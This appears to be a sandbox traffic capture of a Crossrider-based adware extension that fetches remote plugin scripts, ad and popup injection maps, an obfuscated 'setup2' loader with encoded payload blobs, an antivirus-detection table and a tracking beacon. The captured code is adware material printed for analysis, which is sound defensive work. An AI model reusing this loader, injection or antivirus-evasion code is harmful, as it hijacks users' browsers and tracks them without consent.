__CTG_MAPPING__={"1":["d908e50170d7cb46a92fdbff0d73bb5d","0a64c81275732dcf0eb51fc0fdecfaa7","edb18644366c10cc24c58f6fb14ca9f4","15e39ed909ac8e17ae3cc3c91cd7ae9f","dccefc9affe37ba60b49d0a4789ce042","55a7d0f3833487778c3bdff8b2096e93","0212ae9fc1eeb53f9f641335b804d75e","d5e783fe22abe91aae7179d10a958497","9c8a818246bc677ef54725340e9c5a98","6871592501ed31709e241750c4363fce","1c5e3f677b22b8257c1df15a70e7df26","daf4c4488123ddadb30a7adaadb18b54","11fbd0aa23a016619379552c438b081a","fcaed5b82116cd700a0949772ad8ff49","6ac10c5f77cf4309c731a1edca41f357","5c83bc2a9fe11b248ee7a0577c7d8fdd","b4724ce8e3ac8d971ea648c70f1f3a28","5cfdb867e96374c7883b31d6928cc4cb","5bc25469aea12b844db6b49146c3e0ed","15830c2f3218394a63d70b23d235cc1c","7f5e73ea77ef99619089c3857dafdcb4","029c1c42a9160c3cf3db1a687f11ff72","e84400c002083678aa69041045895fae","da0239e7da0330fb26ef37dd1d940044","993439d6f7a4548cae1381c9073cbee1","24414caa6316a5694f77499fa604e5b1","340d70f50a7a4507bc874c8108bb45bc","2e44b2f1bf1b2b87d2be9f94ad2a2a35","5484845885ffd608ebb0ad1ac39434d4","96eb5194f361b233bf8fb9a80267f1de","91e4f116b8a4f5258b982d3c10910bdf","5638298177fc6af5190590244d6d8035","7712b7ac7ec5d5966fb35b1425d0283f","1080cee006e84c91858613ce7dde99fb","428d0f3d623a15db6cacb689e86b4352","8b25ca5c09e10312a1567fb3d7f82c07","84dcb17eaafb9d32908759a607838c8b","fcbed3a6b1e592c8efddf3f925b26b7f","7eae142b683afcf5aee231291c679877","9bcd814058bcf8f6497f0495e0a2fd71","6bb8719fca4581212b3aa47da8755163","adb2121658b69c9a701f270c8faba02f","5694f231cd01d8222d59557c56cef9a7","b7444e18
<<< skipped >>>
GET /plugins/mins/345.js?ver=47&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:29 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1450797163"
Last-Modified: Tue, 22 Dec 2015 15:12:43 GMT
Cache-Control: max-age=900
Content-Length: 781
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422149.dop006.fr7.t,1456422149.cds047.fr7.c
__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,264,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344,363,368,372,374,379,387,388,393,399,408,410,413,415,416,418,421,424,437,446,452],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358,390,396,401,423,436,439,440,450,459],intext:[103,117,123,142,259,263,342,359,360,391,402,442],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351,369,370,371,375,385,389,397,409,411,412,414,419,441,443,444,451,453,457]};....
GET /plugins/mins/246.js?ver=17&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:29 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1424173488"
Last-Modified: Tue, 17 Feb 2015 11:44:48 GMT
Cache-Control: max-age=682
Content-Length: 7448
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422149.dop006.fr7.t,1456422149.cds059.fr7.c
var _0x8f59=["10","11","19","20","26","27","28","29","30","39","40","50","51","52","53","54","55","56","57","60","installer","getAdditionalInfo","isFunction","utils","isDefined","asw","isArray","length","toLowerCase","platform","np","ni","browser_name","__BROWSER_NAME__","getIds","installer_verifier","","string","charCodeAt","replace","match","apply","fromCharCode","Base64","decode","call","parse","JSON","monetization","internal","plugins","un","def","ined","pluginId","getExtendedSubId","function","slice","getSubId","getTime","_","join","na","httpUrl","__RND__","g","__ADVANCE_USER__","__CROSSRIDER_ASW__","__CROSSRIDER_INSTALL_TIME__","getUnixTime","__CROSSRIDER_COUNTRY_CODE__","getCountry","__CROSSRIDER_EXTENDED_SUB_ID__","__CROSSRIDER_USER_ID__","userId","appInfo","__CROSSRIDER_VERIFIER__","__CROSSRIDER_INSTALLER_USER_ID__","getUserId","__CROSSRIDER_APP_ID__","appID","__CROSSRIDER_BROWSER__","__CROSSRIDER_CAMP_ID__","getCampaignId","__CROSSRIDER_LIGHT_SUB_ID__","__CROSSRIDER_APP_NAME__","name","__CROSSRIDER_SUB_ID__","httpsUrl","inlineJS","waitForBodyReady","undefined","addRemoteJS"];setup2=function(m,k){var h={ie:_0x8f59[0],ni:_0x8f59[1],te:_0x8f59[2],ch:_0x8f59[3],to:_0x8f59[4],sb:_0x8f59[5],op:_0x8f59[6],tc:_0x8f59[7],ff:_0x8f59[8],tf:_0x8f59[9],sf:_0x8f59[10],nv:_0x8f59[11],ms:_0x8f59[12],mf:_0x8f59[13],mc:_0x8f59[14],np:_0x8f59[15],sm:_0x8f59[16],fm:_0x8f59[17],cm:_0x8f59[18],mx:_0x8f59[19]},i=function(){return appAPI[_0x8f59[20]]&&appAPI[_0x8f59[23]][_0x8f59[22]](appAPI[_0x8f59[20]][_0x8f59[21]])?appAPI[
<<< skipped >>>
GET /plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=43&rnd=3029 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:26 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1456422146"
Last-Modified: Thu, 25 Feb 2016 17:42:26 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-Length: 1681
Content-Type: application/xml; charset=utf-8
X-HW: 1456422146.dop001.fr7.t,1456422146.cds047.fr7.p
<?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>. <Ver>151</Ver>. <ShortName>winservice86</ShortName>. <Description>winservice</Description>. <PublisherName>Corporate Inc</PublisherName>. <HomePageLink>NA</HomePageLink>. <JSLink>hXXp://js.newcloudrack.com/plugin/apps/64755/js/na/ie/app_code.js</JSLink>. <GroupID>0</GroupID>. <Domain>NA</Domain>. <RunInIframe>false</RunInIframe>. <ThanksURL>NA</ThanksURL>. <EmailSignature>NA</EmailSignature>. <SettingsURL>NA</SettingsURL>. <CertifiedInstall>NA</CertifiedInstall>. <ExposeSites>NA</ExposeSites>. <RemoteFBApiURL>NA</RemoteFBApiURL>. <DisableIE>true</DisableIE>. <DisableFF>true</DisableFF>. <EnableSearchIE>false</EnableSearchIE>. <EnableSearchFF>false</EnableSearchFF>. <AddressbarIE>NA</AddressbarIE>. <AddressbarFF>NA</AddressbarFF>. <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>. <AddressbarCR>NA</AddressbarCR>. <NewTabURL>NA</NewTabURL>. <NewTabEmbed>NA</NewTabEmbed>. <OpenSearchURL>NA</OpenSearchURL>. <BackgroundJS>hXXp://js.newcloudrack.com/plugin/apps/64755/bg/na/ie/bg_code.js</BackgroundJS>. <BackgroundVer>17</BackgroundVer>. <Manifest>NA</Manifest>. <ChangePrevious>fa
<<< skipped >>>
GET /stats.gif?action=daily&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422037&lifetime=23&rnd=3481 HTTP/1.1
Accept: */*
Host: stats.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: DlPZOvBoJzIz/WFxryltbeCWhjeZWYMKP8KB2vlHmB8ORsxqa5/niF5PGR1hgMPzu5Zh9zWShvk=
x-amz-request-id: C02D4ECBCD887647
Date: Thu, 25 Feb 2016 17:42:35 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:06:38 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..
GET /COMODOCodeSigningCA2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.comodoca.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:22 GMT
Content-Type: application/x-pkcs7-crl
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d02ba43ed8f4a94da5de304b643a54a3b1456422142; expires=Fri, 24-Feb-17 17:42:22 GMT; path=/; domain=.comodoca.com; HttpOnly
Last-Modified: Wed, 24 Feb 2016 21:13:33 GMT
ETag: W/"56ce1cfd-11987"
X-CCACDN-Mirror-ID: h6edcacrl9
Cache-Control: public, max-age=14400
CF-Cache-Status: HIT
Expires: Thu, 25 Feb 2016 21:42:22 GMT
Server: cloudflare-nginx
CF-RAY: 27a534d5f171273e-FRA
5ba7..0....0.......0...*.H........0{1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....COMODO CA Limited1!0...U....COMODO Code Signing CA 2..160224211333Z..160228211333Z0....0".........=...[...<...110824203440Z0".....[..x.Ik.M..ud...110825114542Z0!..Y\7.o...p......F..110825134216Z0!..*..d.. .D>Z...bH..110825235944Z0!..v.....U...........110826180316Z0"......a...sj.........110827065611Z0"....g..?R.G.=s.......110829195328Z0!..q.?@..|f..........110829205743Z0!..<..=. :4.....|Sk..110830163519Z0"....3.>&.=.&.QB.z....110830195540Z0".....W...p.~.....0T..110901131432Z0!...c:6`....V ...}...110901131823Z0".........<.....J.....110901152743Z0!..M....A...=...z.Z..110901185932Z0".........b........y..110901212800Z0"....,..p.....;.@.0...110902154630Z0".....8...b8..}.CO....110902175624Z0"....v.<u\...`....^...110902194811Z0!.. gR`..k}.0c....7..110902205032Z0"....#.y...}[.^.=.. ..110905122329Z0"....8l.q.x.....<..K..110905140709Z0!....=...oHF<v..O....110906095658Z0!..(..j.z5..p.....n..110906140412Z0"....=A.w.p...........110907092516Z0!..5....r..R.a..4....110907092609Z0!.........D..).^.'...110907092655Z0!..[....1............110907132010Z0".......3Ee....p-.....110908132554Z0!..A.v...GR..JJ)c.b..110909093345Z0"....b..T..]..........110910043824Z0"....f.......T.V.N{9..110910044920Z0!..,......h.L.T.|.U..110912173144Z0"....-...D,.UM...O.V..110912173717Z0!.. b......f..j.p.^..110913094740Z0!..Jc...RX.lp!.......110913102919Z0!..R..A.z{~.X...B....110913165335Z0!..>......b|...Rw.g..110914090437Z0!
<<< skipped >>>
GET /plugin/apps/64755/js/na/ie/app_code.js?ver=151&rnd=6315 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:26 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1452026982"
Last-Modified: Tue, 05 Jan 2016 20:49:42 GMT
Cache-Control: max-age=900
Content-Length: 617
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422147.dop015.fr7.t,1456422146.cds062.fr7.pr
.. /************************************************************************************. This is your Page Code. The appAPI.ready() code block will be executed on every page load.. For more information please visit our docs site: hXXp://docs.crossrider.com.*************************************************************************************/..appAPI.ready(function($) {.. // Place your code here (you can also define new functions above this scope). // The $ object is the extension's jQuery object.. // alert("My new Crossrider extension works! The current page is: " document.location.href);..});......
GET /plugin/apps/64755/bg/na/ie/bg_code.js?ver=17&rnd=9830 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:27 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1452026982"
Last-Modified: Tue, 05 Jan 2016 20:49:42 GMT
Cache-Control: max-age=900
Content-Length: 432
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422147.dop015.fr7.t,1456422147.cds009.fr7.pr
../************************************************************************************. This is your background code.. For more information please visit our wiki site:. hXXp://docs.crossrider.com/#!/guide/scopes_background.*************************************************************************************/..appAPI.ready(function($) {.. // Place your code here (ideal for handling browser button, global timers, etc.)..});......
GET /plugin/apps/64755/plugins/na/ie/plugins.json?ver=128&rnd=5028 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1452026983"
Last-Modified: Tue, 05 Jan 2016 20:49:43 GMT
Cache-Control: max-age=900
Content-Length: 15403
Content-Type: text/plain; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds060.fr7.pr
{.."plugins_version": 128,.."plugins_list":. [. {"id":4,"url":"hXXp://js.newcloudrack.com/plugins/javascripts/jquery-1_7_1_min.js","ver":5,"name":"jquery_1_7_1","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":1,"order":10200},{"run_at":0,"order":100},{"run_at":5,"order":100},{"run_at":2,"order":10200}],"enabled":true},{"id":2,"url":"hXXp://js.newcloudrack.com/plugins/mins/2.js","ver":2,"name":"ie8_fix_1","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10100},{"run_at":2,"order":10100}],"enabled":true},{"id":3,"url":"hXXp://js.newcloudrack.com/plugins/mins/3.js","ver":2,"name":"ie8_fix_2","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10300},{"run_at":2,"order":10300}],"enabled":true},{"id":47,"url":"hXXp://js.newcloudrack.com/plugins/mins/47.js","ver":3,"name":"resources_background","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"run_at":0,"order":30000},{"run_at":5,"order":30000}],"enabled":true},{"id":246,"url":"hXXp://js.newcloudrack.com/plugins/mins/246.js","ver":17,"name":"setup","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":0,"order":5},{"run_at":1,"order":5}],"enabled":true},{"id":253,"url":"hXXp://js.newcloudrack.com/plugins/mins/253.js","ver":2,"name":"pixel_inject","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"tar
<<< skipped >>>
GET /plugins/mins/390.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425996283"
Last-Modified: Tue, 10 Mar 2015 14:04:43 GMT
Cache-Control: max-age=900
Content-Length: 823
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds072.fr7.c
if (typeof setup2 === 'function') { setup2('MGQ2ZDY4NWEwYzFmMTMxNTNiMDMxYTQ1NWI1ODQ2MDMxMzExMWU0YjU5NDgwMjFjMGEwODA2MDYwNjE0NWIwNjRmMTkwZjBhMGEwNDA3MTkxMjQ5MGYxZDEwNDQxNDEwMGM1ZTFlNTc1ODQwNTYwOTAyNGEzMTJlMzUzNTJlMmIzNzM5MmUyMTJiMjMyOTIyMzkyYzIxMjUyMzIwMmEyZTI1MzIyMzI3MmQyZjM4M2E0MTFkNTgwZDEyNDcxNDAyMDM1ODVjNDM0ZjUyNDcxZDFjMWY1YTNhMzEzMjI0MjgzMjJiMzYyMjIzMjAzYzJlMzczNzMxMjcyYTJhMmEyMDMxMmU1NDRiNmI3MTQ2MDMxMzExMWUwMjIzMTUwZDVhNWU0YjQ1MGQxYTA1MDYxNDViNTc0YjA4MDMwYjBkMTAxNTBmMDQ1NTA1NDUwNjBlMGYxYzE3MGUwOTFjNGEwNTAyMTE0MTAyMDMwNTRlMTA1NDUyNWY1NzBjMTQ1OTM4M2UzYjM2MjQzNDM2M2MzODMyMjIzMzI3MjEzMzMzMjAyMDM1MzMyMzNlMmIzMTI5MzgyYzJhMmUyOTQ4MGQ1NjBlMTg1ODE1MDcxNTRiNTU1MzQxNTE0ZDAyMWQxYTRjMjkzODIyMmEyYjM4MzQzNzI3MzUzMzM1M2UzOTM0M2IzODJiMmYzYzMzMzgzZTVhNDg2MTZlNDcxZTFkMDMwMDA4MTYyZDBmNDU1ZjRlNDI0ZjU3NmIwNQ==', 'vgaxdkgenq'); }....
GET /plugins/mins/391.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426068985"
Last-Modified: Wed, 11 Mar 2015 10:16:25 GMT
Cache-Control: max-age=900
Content-Length: 795
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds072.fr7.c
if (typeof setup2 === 'function') { setup2('MTk0YjAwMWYwMTE3MmQxYTFlNTM1ODRiMDAxZjAxMTc0MjQ3NWQxMjA2MDcwYjBhMTYwZjFkNDUxMzVmMDMwMjA5MDYxNDBlMTAwYzVjMWYwNzFkNDcxODAwMDU1NzAwNDI0ODVhNWIwYTBlNWEzODI3MmIyMDNlMzEzYTNhMjIzMTIyMmEzNzM3MjkzNjJjMjYyZjMwMjMyNzNiMjczMzNkMjAyYzM0MmE0ODE0NDYxODAyNWQxOTAxMGY0ODU1NGE1MTQ2NTcwNzExMWM1NjJhMzgzYjNhM2QyMjMxM2IyMTJmMzAzNTI3MjkyMjIxM2QyNzI5MjYzMDM4Mjc0YTVlNTMwYTFkMWMxYjA2MzIwYTA0NTA0YjQwMDExYzFmMDUxNDQyNDc1ZDEyMDYwNzBiMGExNjBmMWQ0NTEzNWYwMzAyMDkwNjE0MGUxMDBjNWMxZjA3MWQ0NzE4MDAwNTU3MDA0MjQ4NWE1YjBhMGU1YTM4MjcyYjIwM2UzMTNhM2EyMjMxMjIyYTM3MzcyOTM2MmMyNjJmMzAyMzI3M2IyNzMzM2QyMDJjMzQyYTQ4MTQ0NjE4MDI1ZDE5MDEwZjQ4NTU0YTUxNDY1NzA3MTExYzU2MmEzODNiM2EzZDIyMzEzYjIxMmYzMDM1MjcyOTIyMjEzZDI3MjkyNjMwMzgyNzRhNWU1MzEyMDUxZDBjMWMwOTMxMGM1MDRiNTE1MDU5MTY=', 'bihkugxhrq'); }....
GET /plugins/mins/200.js?ver=6&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439709638"
Last-Modified: Sun, 16 Aug 2015 07:20:38 GMT
Cache-Control: max-age=900
Content-Length: 887
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds054.fr7.c
if (typeof setup2 === 'function') { setup2('MGM2ZDZhNGUxMTAyMWUxZjI0MWYxYjQ1NTk0YzViMWUxZTFiMDE1NzU4NDgxMTE5MTUxMzE5NDEwMjA0MWEwZTBmMGQwYjEyMGYwZTFkMWU1OTA5MDYxODU2MDA1YjQxNDE0MjAwMGYwYTE4MWMxYTAzMWMwNTQyNDY1NzU0NWM1NjI5MzUyYzIzMjIyNDM0MzEyNTNkMzMzODMwMzQzNTIzMjIyZDI4M2MzMjM1M2MyNDJmMjgyZTI3MzMyNjU5MzUzMDM1MjIzYTI2MmEyMjI2Mjk1NTFmMTAxZjAzMDkwNjFlMzcxNzA3MGE0YzMyMjgyNDMxMjMyYTI1MzgyNjM1MjgyNTM4MjIzYzI5MjkyNDJlM2MyODI4Mzg0MTQwNzM3ZjQ4MDcwNTE5MDcxNDM2MWUxNTU0NTA0ZjUzMDUwMzEzMTMxZjQzNTk0NTFkMDQwMTEyMTQ0ZDFmMTAxYjAzMDMxMDFmMTMwMjAyMDAwYTU4MDQwYTA1NDIwMTU2NGQ1YzU2MDEwMjA2MDUwODFiMGUxMDE4NTY0NzVhNTg0MTQyMjgzODIwM2UzNjI1MzkzZDM4MjkzMjM1M2MyOTIxMjIyZjIxMzUyODMzMzgzMDM5M2IyOTIzMmIyZTMyNTgzODNjMjgzNjNiMmIyNjNmMzIyODU4MTMwZDBiMDIwNDBhMDMyMzE2MGEwNjUxMjYyOTI5M2QzZTNlMjQzNTJhMjgzYzI0MzUyZTIxM2QyODI5MjIyMTNjMjkzNTRkNWQ2NzdlNDUxMzAwMGMxMTAzMDEzODA5NTU1ZDQzNWU0OTQ2NjAxMg==', 'wgclyvjoqm'); }....
GET /plugins/mins/288.js?ver=4&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426880306"
Last-Modified: Fri, 20 Mar 2015 19:38:26 GMT
Cache-Control: max-age=68
Content-Length: 963
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds041.fr7.c
if (typeof setup2 === 'function') { setup2('MWU2NzVhNWE1NDQ1NTMxYjE5MTcxNTM4MDgxNjU2NWY1MTUxMDUxNzExMWQ0MDU1NWIwYzAyMDcwYzE3MGMwZTU0MWYwNzBkMWUwMzBlMGMwODFkNTQxOTFiMDg1ZTE1MDI0YzA4MDQxNDU1MTcxNzAwMTA0MzA5MTY1MjEyMTMxMDU4MmUyYzJlMzEyYTNlMjkyODNkMjEzNDIxMzIzNjM2MjgyODI1M2QyMTJlMmM0YjAxMGIwYzE3MWY0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMmMzMzM1MzIzNDNiMzkyMDJlMmM0YjEwMTAwZjEzMWU0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMjgzYjMxMjgzNDNlMzEyMTJlMjAzODIxM2EyNDNlMjUyYjQ3NWQ3OTRkNDM0NTRkNTgxMjAwMTEwMTAwMzgxMTA5NGY0MDVhNTYwZDA1MDcxZDEwNWY0MjU1MTMwNzExMTAwNzA0MDA0YjA4MDkxMjFiMTUxMjFjMDAxMzRiMGUxNTE3NWIwMzFlNWMwMDBhMGI0MjE5MDgwNTA2NWYxOTFlNWMwZDA0MWU0NzJiM2EzMjIxMjIzMDM2M2YzMzNlMzEzNzJlMjYzZTI2MzczMjMzM2UyYjNhNTcxMTAzMDIwODA4NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTMwMjMzZDNjMmIyYzM3M2YyYjNhNTcwMDE4MDEwYzA5NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTM0MmIzOTI2MmIyOTNmM2UyYjM2MjQzMTMyMmEyMTMyMjU1ODU4NmY1MTUzNGQ0MzQ3MWQxNjBmMTMwYzFmM2EwOTQxNWY0ZDQ4NDI0YzZmMGM=', 'emzzteqsmc'); }....
GET /plugins/mins/339.js?ver=3&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425914750"
Last-Modified: Mon, 09 Mar 2015 15:25:50 GMT
Cache-Control: max-age=900
Content-Length: 1079
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds054.fr7.c
if (typeof setup2 === 'function') { setup2('MWY2NzQzNTk0YjQzNDExMDAzMDQxNDM4MTExNTQ5NTk0MzVhMWYwNDEwMWQ1OTU2NDQxNzAyMGExMDE1MTA0MDE3MTgwNzA2MGQwYzU5MTMwYjAwNGMxMzE4NGMwMDEwNTg0MzViMTkwYTFkNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzMyMjgzMDI4MmQzZDJlMjczYzJiMjIzMjNiMjQyNzI2MzQ0NTBkMTkxYTE1NTkzMjNjM2EzOTJjMzAyYjI1MzkyMDI4MzEyNjJhMzMzMzI3MzkzMTI5MjgzYzI2NGQwYTA3NDUyODJmMjczZjJjMmEzODMxMmEzYzMyMjIzYjJjMzMyOTM0MmEyNzI3Mjg1NjExMWUwNjBiNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzNlM2UzNzM5MjIzNTI3MjYzMTI3MjIyMzIxM2YzYzMwMmYzYzNjNWE1YjdhNDQ0ZDQzNTk0OTBiMTcwYzA3MDMzMTFmMGY1YjUxNDM0MTEwMDMwNDE0MWU1OTU2NDQxNzAyMGExMDE1MTA0MDE3MTgwNzA2MGQwYzU5MTMwYjAwNGMxMzE4NGMwMDEwNTg0MzViMTkwYTFkNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzMyMjgzMDI4MmQzZDJlMjczYzJiMjIzMjNiMjQyNzI2MzQ0NTBkMTkxYTE1NTkzMjNjM2EzOTJjMzAyYjI1MzkyMDI4MzEyNjJhMzMzMzI3MzkzMTI5MjgzYzI2NGQwYTA3NDUyODJmMjczZjJjMmEzODMxMmEzYzMyMjIzYjJjMzMyOTM0MmEyNzI3Mjg1NjExMWUwNjBiNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzNlM2UzNzM5MjIzNTI3MjYzMTI3MjIyMzIxM2YzYzMwMmYzYzNjNWE1YjdhNDQ0ZDQzNTk0OTEzMGYwZDEwMTkwYTI0MDc1YjUxNDM1MDRiNGU3YTE5', 'dmcykccxwp'); }....
GET /plugins/mins/220.js?ver=46&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1433161463"
Last-Modified: Mon, 01 Jun 2015 12:24:23 GMT
Cache-Control: max-age=900
Content-Length: 40450
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds007.fr7.c
if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(f){var i=(function(){var z={"\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64":1,"\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2,"\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4,"\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64":8,"\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64":16,"\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64":32,"\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64":64,"\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64":128,"\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64":256,"\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64":512,"\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64":1024,"\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2048,"\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4096,"\x73\x70\x61\x72\x6B\x5F\x62\x61\x69\x64\x75\x5F\x64\x65\x74\x65\x63\x74\x65\x64":8192,"\x62\x32\x63\x5F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65\x63\x74\x65\x64":16384,"\x63\x72\x6F\x73\x73\x72\x69\x64\x65\x72\x5F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65\x63\x74\x65\x64":32768,